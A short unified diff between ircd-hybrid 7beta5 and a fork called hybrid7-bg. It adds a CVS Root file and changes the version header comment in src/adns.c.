diff -uNrd ircd-hybrid-7beta5/src/CVS/Root hybrid7-bg/src/CVS/Root
--- ircd-hybrid-7beta5/src/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/CVS/Root	Wed Jul 24 18:32:00 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/adns.c hybrid7-bg/src/adns.c
--- ircd-hybrid-7beta5/src/adns.c	Tue Apr 24 17:33:42 2001
+++ hybrid7-bg/src/adns.c	Tue Jun  5 12:35:46 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: adns.c,v 7.20 2001/04/24 21:33:42 androsyn Exp $
+ * $Id: adns.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  * adns.c  functions to enter libadns 
  *
  * Written by Aaron Sethman <androsyn@ratbox.org>
